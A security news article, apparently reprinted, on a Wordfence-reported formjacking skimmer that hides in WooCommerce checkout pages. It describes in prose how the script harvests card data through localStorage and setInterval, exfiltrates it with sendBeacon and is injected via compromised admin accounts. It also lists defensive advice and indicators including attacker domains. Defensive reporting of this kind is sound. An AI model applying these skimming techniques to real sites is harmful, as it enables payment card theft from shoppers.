New Formjacking Malware Targets E-Commerce Sites to Steal Credit Card Data
A disturbing new formjacking malware has emerged, specifically targeting WooCommerce-based e-commerce sites to steal sensitive credit card information, as recently uncovered by the Wordfence Threat Intelligence team.
Unlike conventional card skimmers that overlay fake forms on checkout pages, this malware seamlessly integrates into the legitimate payment workflow of WooCommerce sites, mimicking their design and functionality with alarming precision.
This sophisticated integration makes it nearly impossible for both site owners and customers to detect the malicious activity, as the injected payment form appears professional, complete with styled HTML elements, familiar fields for card details, and even SVG icons resembling legitimate payment card graphics.
Sophisticated Attack on WooCommerce Platforms
The malware operates by injecting malicious JavaScript that visually blends with legitimate code through professional formatting and conventional syntax, evading casual inspection.
It activates on checkout pages, identified via URL checks, and uses the browser’s localStorage to persistently store stolen data like card numbers, expiration dates, and CVVs, alongside personal information such as names, addresses, and emails.
This persistence ensures data remains accessible even across browser sessions or interruptions, while a clever anti-forensic design delays exfiltration to obscure timelines of theft.
The script employs the navigator.sendBeacon() API for silent, non-blocking data transmission to remote Command & Control (C2) servers, bypassing CORS preflight checks and leaving minimal traces in browser tools or site logs.
Technical Breakdown of the Malware Mechanics
Continuously monitoring form fields via multiple setInterval() calls, the malware captures input in real-time, ensuring data is harvested even if a transaction isn’t completed.
The infection likely stems from compromised WordPress admin accounts, with malicious code injected via plugins like Simple Custom CSS and JS, exploiting database-stored settings or cached pages for dynamic insertion.
Initial findings suggest the compromise vector involves unauthorized access to administrative privileges, followed by the insertion of malicious JavaScript through plugins that permit custom code.
Cached files revealed comments hinting at plugin misuse rather than inherent vulnerabilities, with the malware predominantly residing in cached pages or database entries.
This dynamic injection method, bypassing traditional PHP-based infections, underscores the evolving nature of web threats.
According to the Report, The Wordfence team responded swiftly, developing a detection signature on April 25, 2025, and releasing it to Premium users by May 6, with free users gaining access on June 5.
Their database, boasting over 4.3 million malicious samples, aids in blocking over 99% of such threats via plugins and CLI scanners.
For protection, users are urged to leverage browser extensions like uBlock Origin, inspect network activity during checkout, use virtual or disposable payment methods, monitor bank statements, and clear browser data post-transaction.
This malware represents a chilling evolution in formjacking tactics, exploiting legitimate web technologies to undermine user security with unparalleled stealth.
Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
navigator.sendBeacon() Usage |
API calls to external domains during checkout |
| Unexpected JavaScript | Unrecognized scripts on checkout pages |
| Unusual localStorage Activity | Storage of payment data in browser localStorage |
Multiple setInterval() Calls |
Continuous monitoring of billing form fields |
| Involved Domains | searchpixelstuff.top, justmerikschill.top, pinkmanpixel.top, schoolmeriks.top |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
